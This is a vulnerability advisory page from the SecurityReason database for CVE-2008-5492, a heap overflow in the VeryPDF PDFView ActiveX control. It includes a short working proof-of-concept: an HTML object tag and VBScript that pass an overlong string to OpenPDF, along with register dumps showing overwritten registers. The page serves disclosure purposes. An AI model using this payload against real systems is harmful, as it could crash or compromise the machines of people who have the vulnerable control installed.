|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4715 CVE : CVE-2008-5492 CWE : CWE-119 SecurityRisk : High  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Available : No Credit : r0ut3r Published : 13.12.2008
Advisory Content : <!-- VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow Discovered & Written By: r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) Advisory: http://www.bmgsec.com.au/advisory/39/ --------------------------------------------------- Tested on: WinXP Pro SP2 Version: 2.0.0.1 GUID: {433268D7-2CD4-43E6-AA24-2188672E7252} RegKey Safe for Script: True RegKey Safe for Init: True EAX 0003C910 ASCII "AAAAAAAAA"" ECX 000301D0 EDX 00000040 EBX 41414141 ESP 0013B8D8 EBP 0013BAF4 ESI 0003C908 ASCII "AAAAAAAAAAAAAAAAA"" EDI 41414141 EIP 7C91B3FB ntdll.7C91B3FB --> <object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object> <script language='vbscript'> Sub Boom buff = String(1006, "A") target.OpenPDF buff, 1, 1 End Sub </script> <input type=button onclick=Boom() value='Boom?'> References : http://securityreason.com/expldownload/1/5128/1 (Exploit) http://www.bmgsec.com.au/advisories/openpdf.txt
 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |